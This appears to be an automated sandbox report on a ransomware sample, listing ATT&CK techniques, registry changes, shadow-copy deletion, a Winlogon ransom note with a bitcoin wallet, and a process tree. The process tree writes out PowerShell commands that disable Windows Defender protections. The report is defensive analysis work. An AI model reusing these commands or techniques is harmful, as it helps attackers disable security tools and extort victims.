58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

Analysis

max time kernel
92s
max time network
142s
platform
windows10_x64
resource
win10v200722
submitted
03-09-2020 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size

82KB
MD5

e01e11dca5e8b08fc8231b1cb6e2048c
SHA1

4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512

298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

28 4436 mshta.exe
30 4436 mshta.exe
32 4436 mshta.exe
Executes dropped EXE 1 IoCs

Processes:

c3eokz5t.exe

pid process

4404 c3eokz5t.exe

flow	pid	process
28	4436	mshta.exe
30	4436	mshta.exe
32	4436	mshta.exe

pid	process
4404	c3eokz5t.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\SplitMerge.tiff.crypted	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
File opened for modification	C:\Users\Admin\Pictures\SplitMerge.tiff	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Drops startup file 1 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

vssadmin.exe

description ioc process

File opened (read-only) \??\h: vssadmin.exe
File opened (read-only) \??\H: vssadmin.exe

description	ioc	process
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat	svchost.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5196	vssadmin.exe
4828	vssadmin.exe
4020	vssadmin.exe
4416	vssadmin.exe
5140	vssadmin.exe
6028	vssadmin.exe
3016	vssadmin.exe
4356	vssadmin.exe
4276	vssadmin.exe
780	vssadmin.exe
4904	vssadmin.exe
5608	vssadmin.exe
2108	vssadmin.exe
5824	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5296 taskkill.exe
4872 taskkill.exe
5036 taskkill.exe

pid	process
5296	taskkill.exe
4872	taskkill.exe
5036	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 5b04d4251082d601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7	svchost.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5060 PING.EXE

pid	process
5060	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exe

pid	process
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
1336	powershell.exe
1336	powershell.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
1336	powershell.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

svchost.exe58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	408	svchost.exe
Token: SeCreatePagefilePrivilege	408	svchost.exe
Token: SeDebugPrivilege	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe
Token: SeProfSingleProcessPrivilege	1336	powershell.exe
Token: SeIncBasePriorityPrivilege	1336	powershell.exe
Token: SeCreatePagefilePrivilege	1336	powershell.exe
Token: SeBackupPrivilege	1336	powershell.exe
Token: SeRestorePrivilege	1336	powershell.exe
Token: SeShutdownPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeSystemEnvironmentPrivilege	1336	powershell.exe
Token: SeRemoteShutdownPrivilege	1336	powershell.exe
Token: SeUndockPrivilege	1336	powershell.exe
Token: SeManageVolumePrivilege	1336	powershell.exe
Token: 33	1336	powershell.exe
Token: 34	1336	powershell.exe
Token: 35	1336	powershell.exe
Token: 36	1336	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeIncreaseQuotaPrivilege	3016	powershell.exe
Token: SeSecurityPrivilege	3016	powershell.exe
Token: SeTakeOwnershipPrivilege	3016	powershell.exe
Token: SeLoadDriverPrivilege	3016	powershell.exe
Token: SeSystemProfilePrivilege	3016	powershell.exe
Token: SeSystemtimePrivilege	3016	powershell.exe
Token: SeProfSingleProcessPrivilege	3016	powershell.exe
Token: SeIncBasePriorityPrivilege	3016	powershell.exe
Token: SeCreatePagefilePrivilege	3016	powershell.exe
Token: SeBackupPrivilege	3016	powershell.exe
Token: SeRestorePrivilege	3016	powershell.exe
Token: SeShutdownPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeSystemEnvironmentPrivilege	3016	powershell.exe
Token: SeRemoteShutdownPrivilege	3016	powershell.exe
Token: SeUndockPrivilege	3016	powershell.exe
Token: SeManageVolumePrivilege	3016	powershell.exe
Token: 33	3016	powershell.exe
Token: 34	3016	powershell.exe
Token: 35	3016	powershell.exe
Token: 36	3016	powershell.exe
Token: SeIncreaseQuotaPrivilege	2784	powershell.exe
Token: SeSecurityPrivilege	2784	powershell.exe
Token: SeTakeOwnershipPrivilege	2784	powershell.exe
Token: SeLoadDriverPrivilege	2784	powershell.exe
Token: SeSystemProfilePrivilege	2784	powershell.exe
Token: SeSystemtimePrivilege	2784	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3888 wrote to memory of 1336	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1336	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 2784	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 2784	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3016	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3016	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3708	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3708	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 2304	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 2304	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3520	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3520	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1800	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1800	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3596	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 3596	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1716	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1716	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1720	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 1720	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4140	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4140	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4252	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4252	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4352	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4352	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 3888 wrote to memory of 4464	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4464	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4484	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4484	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4512	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4512	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4584	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4584	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4632	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4632	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4660	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4660	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4740	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4740	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4800	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4800	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4836	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4836	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4872	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4872	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4948	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4948	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4464 wrote to memory of 4968	4464	net.exe	net1.exe
PID 4464 wrote to memory of 4968	4464	net.exe	net1.exe
PID 4484 wrote to memory of 5008	4484	net.exe	net1.exe
PID 4484 wrote to memory of 5008	4484	net.exe	net1.exe
PID 3888 wrote to memory of 5036	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 5036	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 2372	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 2372	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4512 wrote to memory of 4148	4512	net.exe	net1.exe
PID 4512 wrote to memory of 4148	4512	net.exe	net1.exe
PID 3888 wrote to memory of 4276	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 3888 wrote to memory of 4276	3888	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4584 wrote to memory of 3648	4584	net.exe	net1.exe
PID 4584 wrote to memory of 3648	4584	net.exe	net1.exe
PID 4632 wrote to memory of 4492	4632	net.exe	net1.exe
PID 4632 wrote to memory of 4492	4632	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
